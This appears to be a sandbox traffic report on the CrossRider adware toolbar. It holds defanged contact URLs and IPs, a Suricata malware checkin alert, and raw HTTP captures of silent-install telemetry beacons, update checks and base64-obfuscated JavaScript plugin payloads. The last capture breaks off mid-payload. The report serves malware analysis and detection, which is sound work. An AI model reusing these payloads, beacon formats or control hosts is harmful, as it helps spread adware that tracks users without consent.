    hxxp://cds.m9u9b7r5.hwcdn.net/plugin/apps/54246/plugins/na/ie/plugins.json?ver=93&rnd=9729
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/42.js?ver=10&rnd=41
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/281.js?ver=2&rnd=41
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/275.js?ver=3&rnd=41
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/286.js?ver=2&rnd=41
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/289.js?ver=1&rnd=41
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/273.js?ver=4&rnd=41
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/260.js?ver=4&rnd=41
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/262.js?ver=2&rnd=41
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/244.js?ver=5&rnd=41
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/263.js?ver=2&rnd=41
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/242.js?ver=4&rnd=8467
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/233.js?ver=7&rnd=8467
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/230.js?ver=7&rnd=8467
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/javascripts/monetization/geo/set_campaign_id_m.js?ver=5&rnd=8467
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/223.js?ver=8&rnd=8467
    hxxp://cds.m9u9b7r5.hwcdn.net/omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/update.xml?rand=3098
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/221.js?ver=4&rnd=8467
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/211.js?ver=7&rnd=8467
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/195.js?ver=28&rnd=8467
    hxxp://cds.m9u9b7r5.hwcdn.net/monetization.gif?rand=3098&event=7&agent_type=2&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&campaign=001359
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/220.js?ver=23&rnd=8467
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/192.js?ver=9&rnd=8467
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/184.js?ver=10&rnd=6334
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/180.js?ver=12&rnd=6334
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/104.js?ver=12&rnd=6334
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/102.js?ver=10&rnd=6334
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/93.js?ver=13&rnd=6334
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/91.js?ver=85&rnd=6334
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/269.js?ver=1&rnd=6334
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/mins/246.js?ver=15&rnd=6334
    hxxp://cds.m9u9b7r5.hwcdn.net/plugins/javascripts/jquery-1_7_1_min.js?ver=5&rnd=6334
    hxxp://cds.m9u9b7r5.hwcdn.net/omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/ping.xml?rand=3105
    hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=update&app=54246&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&ver=1_34_05_12&installtime=1413862412&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001359&subid=0&zdata=0&appver=102&bgver=2&pluginsver=93&curtime=1413862438&lifetime=26&oldappver=33&oldbgver=1&oldpluginsver=27&rnd=793
    hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=102&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_33&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1413862412&procruntime=30&rnd=1413862442
    hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=102&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&installtime=1413862412&curtime=1413862412&lifetime=0&silent=1&procstarttime=1413862412&procruntime=30&rnd=1413862442
    hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab 212.30.134.169
    hxxp://js.newdatastatsserv.com/plugins/mins/230.js?ver=7&rnd=8467 69.16.175.42
    hxxp://ts-crl.ws.symantec.com/tss-ca-g2.crl 23.43.133.163
    hxxp://update.clientstaticserv.com/omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/ping.xml?rand=3105
    hxxp://stats.clientstaticserv.com/apps.gif?action=update&app=54246&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&ver=1_34_05_12&installtime=1413862412&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001359&subid=0&zdata=0&appver=102&bgver=2&pluginsver=93&curtime=1413862438&lifetime=26&oldappver=33&oldbgver=1&oldpluginsver=27&rnd=793 176.32.100.193
    hxxp://stats.clientstaticserv.com/installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=0&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_33&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&procstarttime=1413862412&procruntime=10&rnd=1413862422 176.32.100.193
    hxxp://js.newdatastatsserv.com/plugins/mins/91.js?ver=85&rnd=6334 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugins/mins/184.js?ver=10&rnd=6334 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugins/mins/223.js?ver=8&rnd=8467 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugins/mins/262.js?ver=2&rnd=41 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugins/javascripts/jquery-1_7_1_min.js?ver=5&rnd=6334 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugins/mins/275.js?ver=3&rnd=41 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js?ver=5&rnd=8467 69.16.175.42
    hxxp://update.clientstaticserv.com/omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/update.xml?rand=3098&w=3:uxP7lqHPgjR31A1VCO5ingXndb1rFK_KAHySpOeS13mFOEtsynLmgcq7I6NOZRbf7J9PCORCxJAYvLQBx2b-1W8C0I5TnOv5uontBSViwgQRQhARK-F_MdynNh4BLVWmYQSh2YIjyRn92lVEe91SjRxOzYFYrMl6EX22_Crgr2Q
    hxxp://js.newdatastatsserv.com/plugins/mins/281.js?ver=2&rnd=41 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugin/apps/54246/plugins/na/ie/plugins.json?ver=93&rnd=9729 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugin/apps/54246/js/na/ie/app_code.js?ver=102&rnd=6758 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugins/mins/263.js?ver=2&rnd=41 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugins/mins/244.js?ver=5&rnd=41 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugins/mins/220.js?ver=23&rnd=8467 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugins/mins/246.js?ver=15&rnd=6334 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugins/mins/93.js?ver=13&rnd=6334 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugins/mins/269.js?ver=1&rnd=6334 69.16.175.42
    hxxp://update.clientstaticserv.com/omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/update.xml?rand=3098
    hxxp://update.clientstaticserv.com/omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=3095
    hxxp://js.newdatastatsserv.com/plugins/mins/102.js?ver=10&rnd=6334 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugins/mins/104.js?ver=12&rnd=6334 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugins/mins/180.js?ver=12&rnd=6334 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugins/mins/221.js?ver=4&rnd=8467 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugins/mins/273.js?ver=4&rnd=41 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugins/mins/233.js?ver=7&rnd=8467 69.16.175.42
    hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt 212.30.134.169
    hxxp://js.newdatastatsserv.com/plugins/mins/260.js?ver=4&rnd=41 69.16.175.42
    hxxp://stats.clientstaticserv.com/stats.gif?action=daily&app=54246&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&ver=1_34_05_12&installtime=1413862412&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001359&campaign=001359&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=33&bgver=1&pluginsver=27&curtime=1413862412&lifetime=0&rnd=2940 176.32.100.193
    hxxp://js.newdatastatsserv.com/plugins/mins/42.js?ver=10&rnd=41 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugin/apps/54246/bg/na/ie/bg_code.js?ver=2&rnd=3013 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugins/mins/242.js?ver=4&rnd=8467 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugins/mins/211.js?ver=7&rnd=8467 69.16.175.42
    hxxp://crl.thawte.com/ThawteTimestampingCA.crl 23.43.133.163
    hxxp://logs.clientstaticserv.com/monetization.gif?rand=3098&event=7&agent_type=2&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&campaign=001359 69.16.175.10
    hxxp://js.newdatastatsserv.com/plugins/mins/195.js?ver=28&rnd=8467 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugins/mins/192.js?ver=9&rnd=8467 69.16.175.42
    hxxp://js.newdatastatsserv.com/plugins/mins/286.js?ver=2&rnd=41 69.16.175.42
    hxxp://stats.clientstaticserv.com/apps.gif?action=install&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=102&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&installtime=1413862412&curtime=1413862412&lifetime=0&silent=1&procstarttime=1413862412&procruntime=30&rnd=1413862442 176.32.100.193
    hxxp://js.clientstaticserv.com/plugin/apps/54246/manifest/1_34_05_12/ie6/manifest.xml?ver=33&rnd=4638 69.16.175.42
    hxxp://logs.clientstaticserv.com/monetization.gif?event=3&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&campaign=001359&app=54246&bhover=1_34_05_12&xpiver=0_94&crxver=1_26_33&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1413862412&asw=00000000000000000000000000000000&asw2=00000000000000000010001000000000&browser=ie,de 69.16.175.10
    hxxp://js.newdatastatsserv.com/plugins/mins/289.js?ver=1&rnd=41 69.16.175.42
    hxxp://stats.clientstaticserv.com/installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=102&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_33&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1413862412&procruntime=30&rnd=1413862442 176.32.100.193


    IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

    ET MALWARE Win32/Toolbar.CrossRider.A Checkin

    Traffic

    GET /monetization.gif?event=3&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&campaign=001359&app=54246&bhover=1_34_05_12&xpiver=0_94&crxver=1_26_33&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1413862412&asw=00000000000000000000000000000000&asw2=00000000000000000010001000000000&browser=ie,de HTTP/1.1
    Host: logs.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:42 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1389114507"
    Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
    Cache-Control: max-age=86400
    Content-Length: 35
    Content-Type: image/gif
    X-HW: 1413862422.dop010.am4.t,1413862422.cds058.am4.c
    GIF89a.............,...........D..;..

    

    GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
    Host: VVV.download.windowsupdate.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Content-Type: text/plain
    Last-Modified: Fri, 12 Sep 2014 18:02:51 GMT
    Accept-Ranges: bytes
    ETag: "80179bc4b3cecf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Content-Length: 18
    Cache-Control: max-age=10211
    Date: Tue, 21 Oct 2014 03:33:49 GMT
    Connection: keep-alive
    X-CCC: NO
    X-CID: 2
    1401CFCEB3C4C42958....


    GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
    

    Accept: */*
    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
    Host: VVV.download.windowsupdate.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Last-Modified: Fri, 12 Sep 2014 18:47:05 GMT
    Accept-Ranges: bytes
    ETag: "805a83f2b9cecf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Content-Length: 56928
    Cache-Control: max-age=10076
    Date: Tue, 21 Oct 2014 03:33:49 GMT
    Connection: keep-alive
    X-CCC: NO
    X-CID: 2
    MSCF....`.......,...................I.................,E.Y .authroot.s
    tl..Y-..8..CK...<T...g.v!M.d..f.%d..}K..5..F. ...T..%.,YJ.,!T......
    _..x.<=O.....yy....;3..>.|..~..\.....|......;..8..~.za...."A...q
    .......g..m......<X........j"I........!..-w.....w....P...H..(.?}..2
    .N. .u..a. ...=.C..D.F>rC.. ..|).=.. ..3b.8H.M...(...u8.%...W.g...\
    YB.m:.....dE.........V....$....Dn:....0...S."...o..q.....K...I..K...(x
    %....>A.R...`.0 .........<`L0mp...%....y.....g.n...R0Op..<..,
    ....`0$z.@..&.x"....T..H...<........~..E..".....<<.\B(.......
    [email protected]/"...f.......k..Jm7j....R.5q....Rz.
    .!@...].......Y.[........4.. .D8..&...t.J^O..Q.._..1.J.m5<'k.,....%
    T....i.\.;.;q..S./ 8.?Bu.............}D.Q....L....*..[.."e......15m...
    _.0.M........#..v!..<...@..?sc.y....*.....tX[........{.W4.Q...^u@..
    *..QP.......~.L9N....2r...4.....B..-\(...b.d...K...O.8..Un.......V.<
    ;.......A...V.....(..s..f..q.{N0.hS.,..;M.|G|[email protected].._.....7._6...C.0...
    A;L....%...M=Y.....f.JV.(.5.....0..?*...KZ....jM...8.6U...#...ew.?..?.
    ..........WE.Or..O>..{.'[email protected]}.o:?~....]&l
    t;!...%....}@.d...L.p.a.g ..K."..N1!%..S.bT.H.-.....e..`.0$...0t..DX..
    {.....#./...8.5..M...T.......D......V\C.zy.....3E:..>.{..).QW......
    q....9..n..1....8%,.........r.p@.>. ...Q.?.p..7.?..7...&..!........
    .`. .=....Sf..q.l.A.....L...t.}g..;...f....=.e.~.z....C..*R....H-..=..
    .f..(t'.."....F...g._....n.J..U.4vr`}.....1..o@.....@.#...R. L8....z..
    ].|......3..y..-./....K..6{...s.<R`.}[email protected]....
    <<< skipped >>>
    

    GET /omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/update.xml?rand=3098&w=3:uxP7lqHPgjR31A1VCO5ingXndb1rFK_KAHySpOeS13mFOEtsynLmgcq7I6NOZRbf7J9PCORCxJAYvLQBx2b-1W8C0I5TnOv5uontBSViwgQRQhARK-F_MdynNh4BLVWmYQSh2YIjyRn92lVEe91SjRxOzYFYrMl6EX22_Crgr2Q HTTP/1.1
    User-Agent: Google Update/1.3.25.0;winhttp;cup
    X-Last-HR: 0x0
    X-Last-HTTP-Status-Code: 0
    X-Retry-Count: 0
    If-Match: "BRHtvIFHcNUSomdLAnWeH6iI1SQ"
    Host: update.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1399811332"
    Last-Modified: Sun, 11 May 2014 12:28:52 GMT
    Cache-Control: max-age=21600
    Content-Length: 403
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1413862436.dop017.am4.t,1413862437.cds067.am4.s,1413862436.dop001.se1.r,1413862436.cds019.se1.p,1413862437.cds067.am4.p
    <?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.
    0" server="prod">.  <daystart elapsed_seconds="56508"/>.  <
    ;app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">.  
      <updatecheck status="noupdate"/>.    <ping status="ok"/>
    .  </app>.  <app appid="{b13cb685-2858-4509-bb2e-34e3545b73f9
    }" status="ok">.    <updatecheck status="noupdate"/>.    <
    ping status="ok"/>.  </app>.</response>.    ....


    GET /omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/update.xml?rand=3098 HTTP/1.1
    

    User-Agent: Google Update/1.3.25.0;winhttp
    X-Last-HR: 0x80040881
    X-Last-HTTP-Status-Code: 200
    X-Retry-Count: 0
    Host: update.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1399811332"
    Last-Modified: Sun, 11 May 2014 12:28:52 GMT
    Cache-Control: max-age=21600
    Content-Length: 403
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1413862436.dop017.am4.t,1413862437.cds067.am4.c
    <?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.
    0" server="prod">.  <daystart elapsed_seconds="56508"/>.  <
    ;app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">.  
      <updatecheck status="noupdate"/>.    <ping status="ok"/>
    .  </app>.  <app appid="{b13cb685-2858-4509-bb2e-34e3545b73f9
    }" status="ok">.    <updatecheck status="noupdate"/>.    <
    ping status="ok"/>.  </app>.</response>...

    

    GET /installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=0&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_33&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&procstarttime=1413862412&procruntime=10&rnd=1413862422 HTTP/1.1
    Host: stats.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: iWgZhMz61hH/abToeYxoWIIfOlw 1rP1wEWRnHmzYuJ7751g9oDM0KlFWLStwYTM
    x-amz-request-id: B896F103AC0DE8FA
    Date: Tue, 21 Oct 2014 03:33:43 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:56:39 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;....


    GET /installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=102&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_33&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1413862412&procruntime=30&rnd=1413862442 HTTP/1.1
    

    Host: stats.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: ANu wI9oJQ8 gzBNohUzdmuUThDrmHvL3uEQGuiVJFnmiGB1Qf6E3dMGaC2mixIL
    x-amz-request-id: 00FF35758F9B059E
    Date: Tue, 21 Oct 2014 03:34:03 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:56:39 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;....


    GET /apps.gif?action=install&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=102&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&installtime=1413862412&curtime=1413862412&lifetime=0&silent=1&procstarttime=1413862412&procruntime=30&rnd=1413862442 HTTP/1.1
    

    Host: stats.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2:  oQ1YkHy5hkWQABIFmdoyLL4OO1kXa04na2FBbZght FjWo3f2 kzB0GF/3vcwBT
    x-amz-request-id: 9EBE31A8291AC950
    Date: Tue, 21 Oct 2014 03:34:03 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:56:30 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;..

    

    GET /plugins/mins/275.js?ver=3&rnd=41 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1405263879"
    Last-Modified: Sun, 13 Jul 2014 15:04:39 GMT
    Cache-Control: max-age=900
    Content-Length: 823
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds054.am4.c
    if (typeof setup2 === 'function') { setup2('MDg2MzcwNGUwNDA1MTExYTM2MD
    ExZjRiNDM0YzRlMTkxMTFlMTM0OTVjNDYwZTFmNDIwMTE3MDMwMDE2MTcwYzBkMDkwZjA1
    NGIwOTBjMWU1YzFhNTYxYzA4MWIxNjVmNTA0YTRiNWIxODVmNWM0MDUzMDg1NDExNWQwMz
    BhNTMxZjE4MDE1NzNjMmMzMDNiMzYzZjNmMjMyYzJlMjYyMTJjMmMyMTM4MjkzZjIxMmYy
    NzJjMjAzYzNiMzMyNTM1M2EzNTQ1MTIwMzE5MTcwZDAxMTQ1ODM1M2MzMDIxMjYyYTNmM2
    UzODIxMmYzMTJjMzIzOTI5MzMyMjMwMjgyZjNjMmM1MTQ1NzM2NTRlMTkxMTFlMTMwMDI2
    MWIxNTRlNTY1MTQ3MDIxNzA3MDMxYTQzNDM0MzA2MTY0NDEzMDExYTBhMWMwODA5MDUwMD
    A5MTc1ZDEwMDYxNDQzMWY1ZTE1MGUwOTAwNDY1YTQwNTQ1ZTEwNTY1YTUyNDUxMTVlMWI0
    MjA2MDI1YTE5MGExNzRlMzYyNjJmM2UzZTM2MzkzMTNhMzcyYzJiMzMyOTI5MzEyZjJkMz
    czNjJkMjYzZjM5MzMzYTIzMjcyYzJjNGYxODFjMWMxZjA0MDcwNjRlMmMzNjNhM2UyMzIy
    MzYzODJhMzczNjNiMjYyZDNjMjEzYTI0MjIzZTM2MzYyNjRlNDA3YjZjNDgxMzFmMDYwZT
    EwMDIyNTE1NDc1MDQzNDE0NDVjNzMxMQ==', 'siyllqejcs'); }    ....


    GET /plugins/mins/289.js?ver=1&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1413821196"
    Last-Modified: Mon, 20 Oct 2014 16:06:36 GMT
    Cache-Control: max-age=152
    Content-Length: 903
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds054.am4.c
    if (typeof setup2 === 'function') { setup2('MGM3YjQ3NGQ0NTQ2NDMwOTFmMG
    MwNzI0MTUwMTQ3NWM0MTQzMDMwYzAzMDE1ZDQyNGEwNzRmMTkwZDBhMTIxNDE0MDgxNzEw
    MDgwMjBlNTYxNDFlMGE0MjE1MDcxMzE1MDUxZDA1NWUwYTA0MDk1NDM3NTEzYzBiNTg0ZT
    A0MDQwMTViNTA1ODRkMGIxZTE1NWEzMjNhMjUzMzJlMzgyYjI1MzgyMzI4MzczOTI0Mzkz
    ZjNkMzkzNTIyMjkzYTM1MzQyMzM0MzEzMzJlMzg0YjA0MDIwNTIyMjk0NTQ2NTcwNjFkMT
    UxMjA4MTUwNzFkNGEyZTM4MmUzNzI5MzIzMjM5MzEzMzM0MzUzMjI0MzYzMTNlMjUzOTNh
    MzQzODMyNDc0YTZiNDE0YjU4NTc1MzBmMTkxMTE2MTIzNDE5MTQ1NTRiNDc0ZjBkMTIxNT
    ExMTg0MjU4NWUwNjQzMWQwMDEzMDQwZTBiMTIwMzExMDQwNjAzNGYwMjA0MTU1ODAxMDYx
    ZjExMDgwNDEzNDQxNTFlMWQ1NTNiNTUzMTEyNGU1NDFiMWUxNTVhNWM1YzQwMTIwODBmND
    UyODJlMjQzZjJhMzUzMjMzMjIzYzMyMjMzODI4M2QzMjI0MmYyZjNkMzMyZTM0MzgyNzM5
    MjgyNTM0Mjc1MTEwMDMwOTI2MjQ1YzUwNGQxOTA3MDExMzA0MTEwYTA0NWMzNDI3MzQyMz
    I4M2UzNjM0MjgyNTJlMmEyODMwMzczZDNhMjgyMDJjMmUyNzI4NTM0YjY3NDU0NjQxNDE0
    OTA4MWIwNDAwMDQwYjJmMDU0MzUxNTg0NTQ5NWU2NzE4', 'wqgmefaakx'); }
    ....


    GET /plugins/mins/260.js?ver=4&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:56 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1405263875"
    Last-Modified: Sun, 13 Jul 2014 15:04:35 GMT
    Cache-Control: max-age=900
    Content-Length: 823
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862436.cds046.am4.c
    if (typeof setup2 === 'function') { setup2('MGI3MDdiNTQwZDAwMTYxZjNkMW
    YxYzU4NDg1NjQ3MWMxNjFiMTg1NzVmNTUwNTA1NGIwNDEwMDYwYjA4MTQxZjA2MTMwNjAw
    NGMwYzA3MDA1ZjA5NWQwNjAxMWUxMTVhNWI1YjQyNGIxMzQ2NTM0NTU1MGI1YjA5NWUxMD
    AxNDkxNjFkMDY1MjM3MzIzMzI4M2QyNTM2MjYyYjJiMmQzZjJmM2YyYTIyMjAzYTI2MmEy
    YzMyMjMyZjMwMjkyYzMwM2QzMDRlMGMwMDBhMWMxNzA4MTE1ZjMwMzcyZTIyMzUyMTI1Mz
    czZDI2MmEzYTMyMzEyYTIyMjkyYjM1MmYyYTM3MzI1MjU2Nzg3ZjQ3MWMxNjFiMTgxZTI1
